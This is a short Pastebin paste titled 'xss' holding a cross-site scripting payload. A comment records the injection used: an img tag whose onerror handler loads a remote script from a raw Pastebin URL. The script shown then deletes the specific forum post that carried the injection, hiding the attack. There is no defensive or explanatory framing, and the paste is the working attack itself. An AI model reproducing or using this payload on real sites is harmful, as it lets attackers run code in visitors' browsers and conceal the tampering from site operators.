Advertisement
dravencc

xss

Nov 16th, 2019
186
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // XSS injected using: <img src="/" id="xss" onerror="$('body').append('<SCRIPT SRC=https:\/\/pastebin.com\/raw\/aLgptqv0><\/SCRIPT>')" />
  2.  
  3. var post = document.getElementById('child-messages-1527937');   // Delete the post containing the XSS
  4. post.parentNode.removeChild(post);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement